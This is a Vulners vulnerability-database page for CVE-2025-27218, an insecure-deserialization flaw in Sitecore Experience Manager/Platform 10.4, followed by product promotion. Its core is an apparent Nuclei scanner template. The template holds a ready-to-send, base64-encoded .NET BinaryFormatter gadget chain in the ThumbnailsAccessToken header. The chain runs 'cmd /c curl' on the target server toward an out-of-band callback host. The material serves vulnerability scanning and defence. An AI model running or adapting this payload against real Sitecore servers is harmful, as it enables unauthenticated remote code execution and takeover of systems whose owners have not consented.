| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| The vulnerability of the Sitecore Experience Platform (XP) and Sitecore Experience Manager (XM) content management systems, related to improper code generation, allows attackers to execute arbitrary code. | 6 Jan 202600:00 | – | bdu_fstec | |
| CVE-2025-27218 | 20 Feb 202506:41 | – | circl | |
| Sitecore Experience Manager和Experience Platform 安全漏洞 | 20 Feb 202500:00 | – | cnnvd | |
| CVE-2025-27218 | 20 Feb 202500:00 | – | cve | |
| CVE-2025-27218 | 20 Feb 202500:00 | – | cvelist | |
| Sitecore 10.4 - Remote Code Execution (RCE) | 26 Jun 202500:00 | – | exploitdb | |
| Mars: insecure deserilize object leads to RCE On Sitecore (CVE-██████████-27218) | 12 Apr 202514:39 | – | hackerone | |
| Sitecore CVE-2025-27218 BinaryFormatter Deserialization Exploit | 28 Mar 202518:50 | – | metasploit | |
| CVE-2025-27218 | 20 Feb 202505:15 | – | nvd | |
| Sitecore CVE-2025-27218 BinaryFormatter Deserialization | 28 Mar 202500:00 | – | packetstorm |
id: CVE-2025-27218
info:
name: Sitecore Experience Manager (XM)/Experience Platform (XP) 10.4 - Insecure Deserialization
author: iamnoooob,rootxharsh,pdresearch
severity: medium
description: |
Sitecore Experience Manager (XM) and Experience Platform (XP) 10.4 before KB1002844 allow remote code execution through insecure deserialization.
impact: |
Unauthenticated attackers can execute arbitrary code through insecure deserialization in the ThumbnailsAccessToken header, potentially gaining complete control over the Sitecore server.
remediation: |
Apply KB1002844 update for Sitecore Experience Manager (XM)/Experience Platform (XP) 10.4.
reference:
- https://slcyber.io/blog/sitecore-unsafe-deserialization-again-cve-2025-27218/
- https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003535
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2025-27218
cwe-id: CWE-94
epss-score: 0.6356
epss-percentile: 0.99114
metadata:
verified: true
max-request: 1
tags: cve,cve2025,oast,oob,sitecore,rce,vkev,vuln
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
ThumbnailsAccessToken: {{ base64(base64_decode('AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAAkA==') + hex_decode('0a') + base64(replace(base64_decode('AAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAA7gU8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtMTYiPz4NCjxPYmplY3REYXRhUHJvdmlkZXIgTWV0aG9kTmFtZT0iU3RhcnQiIElzSW5pdGlhbExvYWRFbmFibGVkPSJGYWxzZSIgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiIgeG1sbnM6c2Q9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PVN5c3RlbSIgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiPg0KICA8T2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KICAgIDxzZDpQcm9jZXNzPg0KICAgICAgPHNkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgICAgICA8c2Q6UHJvY2Vzc1N0YXJ0SW5mbyBBcmd1bWVudHM9Ii9jIGN1cmwgYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFiYmJiYmJjY2NjY2NjZGRkZCIgU3RhbmRhcmRFcnJvckVuY29kaW5nPSJ7eDpOdWxsfSIgU3RhbmRhcmRPdXRwdXRFbmNvZGluZz0ie3g6TnVsbH0iIFVzZXJOYW1lPSIiIFBhc3N3b3JkPSJ7eDpOdWxsfSIgRG9tYWluPSIiIExvYWRVc2VyUHJvZmlsZT0iRmFsc2UiIEZpbGVOYW1lPSJjbWQiIC8+DQogICAgICA8L3NkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgIDwvc2Q6UHJvY2Vzcz4NCiAgPC9PYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQo8L09iamVjdERhdGFQcm92aWRlcj4L'),'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbcccccccdddd', padding('http://{{interactsh-url}}/?','A',58,'suffix'))) + base64_decode('Cw==')) }}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- dns
- type: word
part: header
words:
- SC_ANALYTICS_GLOBAL_COOKIE
# digest: 4a0a00473045022025aa1a373f24cea845acb02fdd6ffc270792efec36f8a6d4a9a12ec939c8f25d022100d1c7a2e3f0b8cb4282c6e1e406177e3b3849169de20468289f67ff1aa967def1:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation